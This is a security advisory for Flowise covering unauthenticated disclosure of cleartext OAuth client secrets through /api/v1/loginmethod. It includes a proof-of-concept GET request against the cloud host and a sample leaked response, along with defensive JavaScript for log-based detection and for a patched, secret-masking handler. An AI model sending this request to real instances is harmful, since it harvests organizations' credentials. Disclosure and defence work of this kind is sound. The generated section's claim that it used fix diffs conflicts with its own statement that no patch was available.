Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request
Description
Summary
I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.
PoC
The following request can be sent by anyone on the internet without any cookies or authorization headers.
Request:

```http
GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/json
```
Response: The server returns 200 OK with sensitive credentials:

```json
{
  "providers": [
    {
      "id": "a04ba769-b810-481d-8d6b-84f8c377dea5",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "azure",
      "config": { "tenantID": "", "clientID": "", "clientSecret": "" },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "eda8bd90-1c45-4aca-933f-3a53d9be4161",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "google",
      "config": { "clientID": "123455", "clientSecret": "123455" },
      "status": "enable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "auth0",
      "config": { "domain": "", "clientID": "", "clientSecret": "" },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "github",
      "config": { "clientID": "", "clientSecret": "" },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    }
  ],
  "callbacks": [
    { "providerName": "azure", "callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback" },
    { "providerName": "google", "callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback" },
    { "providerName": "auth0", "callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback" },
    { "providerName": "github", "callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback" }
  ]
}
```
Affected Deployments
- FlowiseAI Cloud (cloud.flowiseai.com)
- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed
Impact
An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| flowise (npm) | < 3.1.0 | 3.1.0 |
Vulnerability mechanics
Root cause
"Missing authentication check on the /api/v1/loginmethod endpoint allows unauthenticated access to SSO configuration containing cleartext OAuth secrets."
Attack vector
An unauthenticated attacker sends a GET request to `/api/v1/loginmethod?organizationId=<any_organization_id>` without any cookies or authorization headers [ref_id=1]. The server responds with the full SSO configuration for the specified organization, including OAuth client secrets (e.g., Google, GitHub, Azure, Auth0) in cleartext [CWE-312] [ref_id=1]. Because no authentication check is performed on this endpoint, any attacker who knows or guesses a valid organizationId can exfiltrate sensitive credentials [CWE-306].
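Because the request described above carries no credentials, the one signal a defender reliably has is the access log. The following detection is an added example and not part of the advisory or of Flowise: it parses constructed combined-format log lines and reports any client that requested `/api/v1/loginmethod` for several distinct organizationId values, which is what walking this endpoint looks like, as opposed to a login page loading its own organization's providers once. The IPs, UUIDs and threshold are placeholders.

```javascript
// Added example (not from the advisory): spot clients walking
// /api/v1/loginmethod across many organizationId values.
// Constructed sample log lines in Apache/nginx combined format.
const SAMPLE_LOG = [
  '203.0.113.10 - - [26/Dec/2025:19:40:01 +0000] "GET /api/v1/loginmethod?organizationId=00000000-0000-4000-8000-000000000001 HTTP/2.0" 200 1843 "-" "curl/8.4.0"',
  '203.0.113.10 - - [26/Dec/2025:19:40:02 +0000] "GET /api/v1/loginmethod?organizationId=00000000-0000-4000-8000-000000000002 HTTP/2.0" 200 1799 "-" "curl/8.4.0"',
  '198.51.100.7 - - [26/Dec/2025:19:40:02 +0000] "GET /api/v1/loginmethod?organizationId=00000000-0000-4000-8000-000000000009 HTTP/2.0" 200 1810 "https://flowise.example/login" "Mozilla/5.0"',
  '203.0.113.10 - - [26/Dec/2025:19:40:03 +0000] "GET /api/v1/loginmethod?organizationId=00000000-0000-4000-8000-000000000003 HTTP/2.0" 401 52 "-" "curl/8.4.0"',
  '203.0.113.10 - - [26/Dec/2025:19:40:04 +0000] "GET /api/v1/chatflows HTTP/2.0" 401 52 "-" "curl/8.4.0"',
  'not a log line',
];

const TARGET_PATH = '/api/v1/loginmethod';
// client ident user [timestamp] "METHOD target PROTOCOL" status
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

// Parse one combined-format line; returns null for lines that do not match.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, timestamp, method, target, status] = m;
  // The base URL only makes the relative request target parseable; it is never used.
  const url = new URL(target, 'http://placeholder.invalid');
  return {
    ip,
    timestamp,
    method,
    path: url.pathname,
    organizationId: url.searchParams.get('organizationId'),
    status: Number(status),
  };
}

// One finding per client IP that asked for at least `threshold` distinct
// organizationId values. Non-200 responses still count towards the threshold:
// probes against a patched server are worth knowing about too, while
// `disclosed` records how many requests actually received a 200.
function findEnumeration(lines, { threshold = 3 } = {}) {
  const byIp = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r || r.method !== 'GET' || r.path !== TARGET_PATH || !r.organizationId) continue;
    if (!byIp.has(r.ip)) byIp.set(r.ip, { orgIds: new Set(), disclosed: 0 });
    const entry = byIp.get(r.ip);
    entry.orgIds.add(r.organizationId);
    if (r.status === 200) entry.disclosed += 1;
  }
  const findings = [];
  for (const [ip, entry] of byIp) {
    if (entry.orgIds.size >= threshold) {
      findings.push({ ip, distinctOrgIds: entry.orgIds.size, disclosed: entry.disclosed });
    }
  }
  return findings;
}

console.log(findEnumeration(SAMPLE_LOG));
```

On the sample above only 203.0.113.10 is reported (three organizationId values, two of which were served with a 200). The threshold is a tuning knob: a legitimate browser session normally requests the endpoint for a single organization, so even a low threshold produces few false positives, and the `disclosed` count tells the responder whether the requests hit the endpoint before or after it was patched.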
Affected code
The vulnerable endpoint is `/api/v1/loginmethod` on FlowiseAI Cloud (cloud.flowiseai.com) and self-hosted instances where that endpoint is exposed [ref_id=1]. The advisory does not specify the exact source file or function name responsible for the handler.
What the fix does
The advisory does not include a patch or specific remediation code [ref_id=1]. The recommended fix is to enforce authentication on the `/api/v1/loginmethod` endpoint so that only authorized users (e.g., organization members or administrators) can retrieve SSO configuration. Additionally, OAuth client secrets should not be returned in API responses or should be masked/encrypted to prevent cleartext exposure [CWE-312].
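Since the advisory ships no patch, here is what the two recommended changes look like together, as an added example that is not Flowise's own code: a handler for `GET /api/v1/loginmethod` that rejects unauthenticated callers (CWE-306), only serves an organization to its own members, and masks `clientSecret` before the record leaves the server (CWE-312). It is written as plain functions so it runs without Express. The `req.user` shape (`{ id, organizationId }`), the `store.getSsoConfig(orgId)` lookup, and the sample record with its IDs and secrets are all assumptions constructed for the example.

```javascript
// Added example, not Flowise's code. Assumptions: an upstream session check
// sets req.user = { id, organizationId } (hypothetical shape), and
// store.getSsoConfig(orgId) returns the stored SSO record or null.

const SECRET_KEYS = new Set(['clientSecret']);
const MASK = '********';

// Mask secret values. An empty string stays empty so a UI can still tell
// "not configured" from "configured"; nothing else about the record changes.
function redactProvider(provider) {
  const config = {};
  for (const [key, value] of Object.entries(provider.config || {})) {
    config[key] = SECRET_KEYS.has(key) && value !== '' ? MASK : value;
  }
  return { ...provider, config };
}

function redactSsoConfig(record) {
  return { ...record, providers: (record.providers || []).map(redactProvider) };
}

// Returns { status, body } like an HTTP handler would.
function handleLoginMethod(req, store) {
  const orgId = req.query && req.query.organizationId;
  if (!req.user) {
    // CWE-306 fix: the endpoint no longer answers guests at all.
    return { status: 401, body: { error: 'authentication required' } };
  }
  if (typeof orgId !== 'string' || orgId !== req.user.organizationId) {
    // Knowing or guessing another organization's UUID must not be enough.
    return { status: 403, body: { error: 'not a member of this organization' } };
  }
  const record = store.getSsoConfig(orgId);
  if (!record) return { status: 404, body: { error: 'organization not found' } };
  // CWE-312 fix: secrets never reach the wire, even for members.
  return { status: 200, body: redactSsoConfig(record) };
}

// Constructed sample store mirroring the response shape in the advisory.
const ORG_ID = '00000000-0000-4000-8000-00000000aaaa';
const SAMPLE_STORE = {
  records: {
    [ORG_ID]: {
      providers: [
        { id: 'p1', organizationId: ORG_ID, name: 'google', status: 'enable',
          config: { clientID: 'constructed-client-id', clientSecret: 'constructed-secret' } },
        { id: 'p2', organizationId: ORG_ID, name: 'github', status: 'disable',
          config: { clientID: '', clientSecret: '' } },
      ],
      callbacks: [
        { providerName: 'google', callbackURL: 'https://flowise.example/api/v1/google/callback' },
      ],
    },
  },
  getSsoConfig(id) { return this.records[id] || null; },
};

// Regression check a test suite can keep: the raw secret must not appear
// anywhere in a serialized response.
function containsRawSecret(body, secret) {
  return JSON.stringify(body).includes(secret);
}

const member = { id: 'u1', organizationId: ORG_ID };
console.log(handleLoginMethod({ query: { organizationId: ORG_ID } }, SAMPLE_STORE).status);          // 401
console.log(handleLoginMethod({ query: { organizationId: ORG_ID }, user: member }, SAMPLE_STORE).body);
```

If the login page itself needs to know which providers are enabled before anyone is signed in, that is an assumption about the UI this example does not cover; the safe way to serve it is a separate response containing only provider names and status, never the `config` object. The redaction is applied to a copy, so the stored record keeps its secrets for the actual OAuth exchange on the server side.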
Preconditions
- network: The /api/v1/loginmethod endpoint must be exposed (true for FlowiseAI Cloud and self-hosted instances that have not restricted it)
- input: Attacker must know or guess a valid organizationId UUID
- auth: No authentication or authorization is required
Reproduction
Send the following HTTP request without any cookies or authorization headers:
```http
GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/json
```
The server returns HTTP 200 with the organization's SSO provider configuration, including cleartext OAuth client secrets [ref_id=1].
Generated on Jun 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.